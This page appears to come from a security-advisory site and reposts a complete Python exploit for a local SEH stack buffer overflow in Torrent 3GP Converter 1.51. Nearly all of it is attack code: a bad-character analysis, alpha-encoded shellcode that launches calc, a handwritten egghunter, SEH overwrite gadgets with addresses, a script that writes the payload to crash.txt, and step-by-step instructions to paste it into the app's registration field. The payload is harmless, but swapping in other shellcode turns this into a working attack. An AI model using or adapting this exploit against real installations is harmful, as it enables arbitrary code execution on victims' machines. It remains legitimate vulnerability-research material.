Torrent 3GP Converter 1.51 Stack Overflow (SEH)

2020.02.01
Credit: boku
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH) # Exploit Author: boku # Date: 2020-01-24 # Software Vendor: torrentrockyou # Vendor Homepage: http://www.torrentrockyou.com # Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe # Version: Torrent 3GP Converter Version 1.51 Build 116 # Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363 # Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363 # Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 # Recreate: # 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86 # 2) run python script & open created 'crash.txt' file # 3) select-all > copy-all # 4) in app, click 'Register' on the bottom # 5) in 'Name:' textbox enter 'a' # 6) in 'Code:' textbox paste buffer # 7) click 'OK', calculator will open & app will crash #!/usr/bin/python # Bad Chars # \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer # \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper # \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper # \x9a => \x8a # \x9c => \x8c # \x9e => \x8e # \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6 # \xf8-\xfe => \xd8-\xde # \xff => \x9f # badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' # Max shellcode size is 2384 bytes # - First 2384 bytes of our buffer is left unmangled on the stack # msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode # x86/alpha_upper chosen with final size 447 # Payload size: 447 bytes ## msfvenom x86/alpha_uppers GetPC Routine ## # [!] Does not work because of the bad chars! # Manually replaced with a working version of GetPC for this exploit # 89E5 mov ebp, esp shellcode = b'\x54\x5D' # push esp # pop ebp # DBCD fcmovne st, st(5) shellcode += b'\x89\xCF' # mov edi, ecx # D975 F4 fstenv [ebp-C] shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop # 5F pop edi shellcode += b'\x90' # nop shellcode += b"\x57\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50" shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59" shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b" shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c" shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a" shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35" shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51" shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a" shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50" shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42" shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31" shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59" shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a" shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59" shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53" shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b" shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c" shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45" shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b" shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36" shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a" shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d" shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35" shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f" shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58" shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58" shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30" shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37" shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50" shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32" shellcode += b"\x4c\x43\x53\x35\x50\x41\x41" # Stack EggHunter for fun & profit egg = 'BOKU' hunterOS = '\x41'*(2784-len(egg+egg+shellcode)) # After executing the code in nSEH, we are left with 88 bytes to create our Hunter hunter = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC hunter += '\x5B' # pop ebx / EBX=PC hunter += '\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz hunter += '\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz hunter += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55 hunter += '\x54' # push esp hunter += '\x59' # pop ecx hunter += '\x90'*18 # nop fillers for jnz short -7 loop hunter += '\x49' # dec ecx hunter += '\x3B\x01' # cmp eax, [ecx] hunter += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars hunter += '\x51' # push ecx hunter += '\x5a' # pop edx hunter += '\x4a'*4 # dec edx * 4 / check if second egg matchs hunter += '\x3B\x02' # cmp eax, [edx] hunter += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars hunter += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs hunter += '\x31\xd2' # xor edx,edx hunter += '\x52' # push edx hunter += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b hunter += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44 hunter += '\xC6\x04\x24\x39' # mov byte [esp],0x39 # [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe) hunter += '\xc3' # ret huntRmdr = '\x41'*(88-len(hunter)) nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr)) nSEH = '\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret # 3-byte SEH overwrite using the truncating Null byte SEH = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH try: f=open("crash.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top